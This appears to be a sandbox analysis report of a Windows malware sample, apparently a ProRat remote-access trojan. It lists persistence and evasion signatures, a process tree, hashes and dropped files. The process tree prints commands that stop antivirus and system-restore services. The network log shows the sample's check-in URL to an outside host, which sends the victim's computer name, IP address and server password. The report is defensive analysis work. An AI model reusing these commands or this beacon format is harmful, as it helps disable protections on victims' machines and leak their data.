Overview

overview

10

Static

static

3

735f2f3c0d...18.exe

windows7-x64

10

735f2f3c0d...18.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    149s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    26/07/2024, 08:54 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    735f2f3c0d78551946debbaae311ac44_JaffaCakes118.exe

  • Size

    2.5MB

  • MD5

    735f2f3c0d78551946debbaae311ac44

  • SHA1

    0fbac06cea353237b488decd7fb172d8a4fdd1e6

  • SHA256

    79525c2360d5eb5b817a6ae852ab1daeb3de171f1fb04c3f67cc62b0cf78765e

  • SHA512

    556f89b7a61acf5226e5cc5845d146aff96d9f9e8ac8c6c7d53846c29d0679f24c5c0d4cf2e5bab70c2de3eb7472e43eec14953140bd8787a3a3f49bb1a84995

  • SSDEEP

    49152:Mr1rcdfkbfLxGETDBIpnsZffVzTSXTkurhjDm8tcGU:UhuMjFVTK6SXTZtmmcGU

Score
10/10
discoveryevasionpersistence

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 2 IoCs
    persistence
  • Adds policy Run key to start application 2 TTPs 4 IoCs
    persistence
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 5 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

    persistence
  • Deletes itself 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Identifies Wine through registry keys 2 TTPs 3 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    evasion
  • Loads dropped DLL 6 IoCs
  • Modifies WinLogon 2 TTPs 2 IoCs
    persistence
  • Drops file in System32 directory 7 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Drops file in Windows directory 8 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\735f2f3c0d78551946debbaae311ac44_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\735f2f3c0d78551946debbaae311ac44_JaffaCakes118.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Adds policy Run key to start application
    • Boot or Logon Autostart Execution: Active Setup
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Modifies WinLogon
    • Drops file in System32 directory
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1940
    • C:\Windows\SysWOW64\fservice.exe
      C:\Windows\system32\fservice.exe
      2⤵
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Drops file in System32 directory
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2072
      • C:\Windows\services.exe
        C:\Windows\services.exe -XP
        3⤵
        • Modifies WinLogon for persistence
        • Adds policy Run key to start application
        • Boot or Logon Autostart Execution: Active Setup
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Modifies WinLogon
        • Drops file in System32 directory
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1288
        • C:\Windows\SysWOW64\NET.exe
          NET STOP srservice
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2236
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 STOP srservice
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2928
        • C:\Windows\SysWOW64\NET.exe
          NET STOP navapsvc
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1792
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 STOP navapsvc
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2012
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\Users\Admin\AppData\Local\Temp\735f2f3c0d78551946debbaae311ac44_JaffaCakes118.exe.bat
      2⤵
      • Deletes itself
      • System Location Discovery: System Language Discovery
      PID:2248

Network

  • flag-us
    DNS
    totonkg.tripod.com
    services.exe
    Remote address:
    8.8.8.8:53
    Request
    totonkg.tripod.com
    IN A
    Response
    totonkg.tripod.com
    IN CNAME
    members.tripod.com
    members.tripod.com
    IN CNAME
    webpub-https-proxy.bo3.lycos.com
    webpub-https-proxy.bo3.lycos.com
    IN A
    209.202.252.105
  • flag-us
    GET
    http://totonkg.tripod.com/cgi-bin/prorat.cgi?bilgisayaradi=RPXOCQRF&ipadresi=10.127.0.191&serverportu=5110&kurban=toto&servermodeli=V1.9:Fix-18&serversaati=9:05:13_AM&servertarihi=7/26/2024&serversifre=5555&islem=log
    services.exe
    Remote address:
    209.202.252.105:80
    Request
    GET http://totonkg.tripod.com/cgi-bin/prorat.cgi?bilgisayaradi=RPXOCQRF&ipadresi=10.127.0.191&serverportu=5110&kurban=toto&servermodeli=V1.9:Fix-18&serversaati=9:05:13_AM&servertarihi=7/26/2024&serversifre=5555&islem=log HTTP/1.1
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Host: totonkg.tripod.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Moved Temporarily
    Server: nginx/1.18.0
    Date: Fri, 26 Jul 2024 09:05:14 GMT
    Content-Type: text/html
    Content-Length: 145
    Connection: keep-alive
    Location: https://totonkg.tripod.com/cgi-bin/prorat.cgi?bilgisayaradi=RPXOCQRF&ipadresi=10.127.0.191&serverportu=5110&kurban=toto&servermodeli=V1.9:Fix-18&serversaati=9:05:13_AM&servertarihi=7/26/2024&serversifre=5555&islem=log
  • 209.202.252.105:80
    http://totonkg.tripod.com/cgi-bin/prorat.cgi?bilgisayaradi=RPXOCQRF&ipadresi=10.127.0.191&serverportu=5110&kurban=toto&servermodeli=V1.9:Fix-18&serversaati=9:05:13_AM&servertarihi=7/26/2024&serversifre=5555&islem=log
    http
    services.exe
    745 B
     1.3kB
     6
    5

    HTTP Request

    GET http://totonkg.tripod.com/cgi-bin/prorat.cgi?bilgisayaradi=RPXOCQRF&ipadresi=10.127.0.191&serverportu=5110&kurban=toto&servermodeli=V1.9:Fix-18&serversaati=9:05:13_AM&servertarihi=7/26/2024&serversifre=5555&islem=log

    HTTP Response

    302
  • 8.8.8.8:53
    totonkg.tripod.com
    dns
    services.exe
    64 B
     145 B
     1
    1

    DNS Request

    totonkg.tripod.com

    DNS Response

    209.202.252.105

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\735f2f3c0d78551946debbaae311ac44_JaffaCakes118.exe.bat
    Filesize

    133B

    MD5

    4d4fb82ea4c84b3b5a20f5004d2058ed

    SHA1

    deac0a4009c1a69656a0681c2ddfa37b09d3c5ff

    SHA256

    257efb98c2a600a64d6c0ffcbfb20b3ebaa58e368e2bfe4b1df4818403aba44d

    SHA512

    e997e7eb615807dac7065049434d637c8000e3acde3d03fe9cec87104b125828c6afc472d77e48fe165c5bb949b6f5c734e8654c8124594da40af97fa191c5d2

    Download Submit

  • \Windows\SysWOW64\fservice.exe
    Filesize

    2.5MB

    MD5

    735f2f3c0d78551946debbaae311ac44

    SHA1

    0fbac06cea353237b488decd7fb172d8a4fdd1e6

    SHA256

    79525c2360d5eb5b817a6ae852ab1daeb3de171f1fb04c3f67cc62b0cf78765e

    SHA512

    556f89b7a61acf5226e5cc5845d146aff96d9f9e8ac8c6c7d53846c29d0679f24c5c0d4cf2e5bab70c2de3eb7472e43eec14953140bd8787a3a3f49bb1a84995

    Download Submit

  • \Windows\SysWOW64\reginv.dll
    Filesize

    36KB

    MD5

    d4a3f90e159ffbcbc4f9740de4b7f171

    SHA1

    0542f5d1e2c23dca8d90766b3a8537dc3880e5c9

    SHA256

    2200dd5f83d2fb8c5d3994206a4fa9ff34b4cbfe56ed39a9a03c954cf45d8f77

    SHA512

    5493beb50b5f7d8ec52f32718d01696916ae173456005d0c1294ce695161ce5004aff58ee3892bf5db0f9b23720146a6d3ae8ffbcbbd81f84d894fdc8cf75a94

    Download Submit

  • \Windows\SysWOW64\winkey.dll
    Filesize

    24KB

    MD5

    43e7d9b875c921ba6be38d45540fb9dd

    SHA1

    f22a73fc0d4aa3ea6c0b8f61d974b028f308acc4

    SHA256

    f1b2b0abe844e6ba812c7f8709a463a7f6c56fa6ac38d376a0739cc3469f795b

    SHA512

    2e74e23c0875b69b82319391c392132f28f4eb45aa412805130382498ae48969a06a2b3a7528b626fa7d7ddb6b006f19f0ef8d73cf73cb9a0c0df44a21077622

    Download Submit

  • memory/1288-67-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

    Download

  • memory/1288-66-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

    Download

  • memory/1288-76-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

    Download

  • memory/1288-75-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

    Download

  • memory/1288-74-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

    Download

  • memory/1288-73-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

    Download

  • memory/1288-31-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

    Download

  • memory/1288-72-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

    Download

  • memory/1288-71-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

    Download

  • memory/1288-35-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

    Download

  • memory/1288-36-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

    Download

  • memory/1288-37-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

    Download

  • memory/1288-70-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

    Download

  • memory/1288-41-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

    Download

  • memory/1288-55-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

    Download

  • memory/1288-53-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

    Download

  • memory/1288-68-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

    Download

  • memory/1288-65-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

    Download

  • memory/1288-69-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

    Download

  • memory/1288-60-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

    Download

  • memory/1288-61-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

    Download

  • memory/1288-62-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

    Download

  • memory/1288-63-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

    Download

  • memory/1288-64-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

    Download

  • memory/1940-15-0x0000000005F90000-0x00000000063A7000-memory.dmp

    Filesize

    4.1MB

    Download

  • memory/1940-57-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

    Download

  • memory/1940-0-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

    Download

  • memory/1940-1-0x0000000000401000-0x0000000000461000-memory.dmp

    Filesize

    384KB

    Download

  • memory/1940-8-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

    Download

  • memory/1940-14-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

    Download

  • memory/1940-16-0x0000000005F90000-0x00000000063A7000-memory.dmp

    Filesize

    4.1MB

    Download

  • memory/2072-54-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

    Download

  • memory/2072-28-0x0000000005FA0000-0x00000000063B7000-memory.dmp

    Filesize

    4.1MB

    Download

  • memory/2072-30-0x0000000005FA0000-0x00000000063B7000-memory.dmp

    Filesize

    4.1MB

    Download

  • memory/2072-22-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

    Download

  • memory/2072-17-0x0000000000400000-0x0000000000817000-memory.dmp

    Filesize

    4.1MB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.